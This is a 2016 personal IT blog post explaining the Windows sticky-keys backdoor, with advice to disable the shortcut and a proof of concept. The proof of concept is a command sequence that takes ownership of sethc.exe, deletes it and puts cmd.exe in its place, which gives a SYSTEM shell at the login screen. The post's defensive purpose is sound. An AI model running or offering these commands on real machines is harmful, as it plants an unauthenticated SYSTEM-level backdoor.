#_ITandME blog

September 6, 2016

Sticky Key "vulnerability"

This *exploit* is really a default feature built into Windows systems XP and higher (also found on Server editions)

While not an exploit in and of itself unless system files are altered, it's just one example of permission elevation that can backdoor an attacker into a system.

09/06/2016: Windows 10 has been tested for this sticky-key "feature"...

Strike shift key 5+ times in rapid succession. By default you will receive a popup window that asks if you want to enable sticky keys...even if you haven't logged in. This is pretty harmless in and of itself, but if you replace the popup file that is called, in this case sethc.exe, with something like cmd.exe, you can gain a SYSTEM level shell without authentication simply by pushing a button. NOT COOL!

This sethc.exe file is a trusted installation file in Windows (NT SERVICE/TrustedInstaller) and runs at system admin level, no questions asked...even with UAC enabled.

Now, to exploit this feature requires access to the system at an Admin level, so it isn't a vulnerability in and of itself. However it does appear to be an abuse of privilages that is often used to attack systems. To disable, simply navigate to Accessibility Options > Keyboard > Sticky Keys > Settings Configurations and uncheck the "keyboard shortcut"

I would recommend disabling this 'feature' out of principle to make Windows a little tighter. It is enabled by default on every platform I've tested (XP, 7, 10, Server).

Proof of concept...

                :: View file ownership details

                        C:\Windows\System32>icacls sethc.exe

                        C:\Windows\System32\sethc.exe NT SERVICE\TrustedInstaller:F
                                                        NT AUTHORITY\SYSTEM:R
                :: copy target (cya)

                        copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc-old.exe

                :: take ownership of target (have to be admin)

                        takeown C:\Windows\System32\sethc.exe

                :: gain full permissions on file

                        icacls "sethc.exe" /grant "Administrators":F (substitute whatever user/group you want)

                :: delete original sethc.exe file

                        del C:\Windows\System32\sethc.exe

                :: copy cmd.exe and name it sethc.exe (cmd has same privs)

                        copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe